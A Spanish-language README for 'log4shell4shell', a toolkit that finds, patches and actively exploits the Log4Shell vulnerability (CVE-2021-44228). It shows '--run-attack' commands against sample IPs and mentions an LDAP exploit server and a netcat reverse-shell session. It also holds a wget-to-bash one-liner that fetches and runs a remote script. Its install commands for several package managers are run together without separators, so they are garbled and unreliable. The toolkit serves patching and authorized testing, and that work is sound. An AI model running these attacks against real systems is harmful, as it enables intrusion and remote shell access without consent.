
Log4shell - Multi-Toolkit. Encuentra, corrige y prueba posibles vulnerabilidades CVE-2021-44228 - proporciona un entorno completo de prueba/ataque LOG4SHELL en shell
Log4j - Multiherramienta. Encuentra y corrige posibles vulnerabilidades CVE-2021-44228 - proporciona un entorno completo de prueba/ataque LOG4SHELL

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
Ejecuta screen -r l4s4s-ldap-srv y/o screen -r l4s4s-nc-rsh para ver algunas informaciones de ataque en el shell del servidor de explotación:
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Ejecutando Log4shell Framework & Check-Toolkit en shell v0.1a (C) 2021 suuhm
¡Entrada incorrecta! Por favor, ingresa una de estas opciones:
Uso: ./l4s4s.sh [OPCIONES] <IP:PUERTO|COMANDO>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMATO: IP:PUERTO> <-e/-t/'cmd'> [--unifi-post]
--python-scan <comando>
Simplemente ejecuta mi script auxiliar (--list-versions): ./python-upgrader.sh
Simplemente ejecuta en Powershell (modo administrador): .\set_windows_fix.ps1
El proyecto log4shell4shell está hecho únicamente con fines educativos y de pruebas éticas. El uso de log4j-scan para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún mal uso o daño causado por este programa.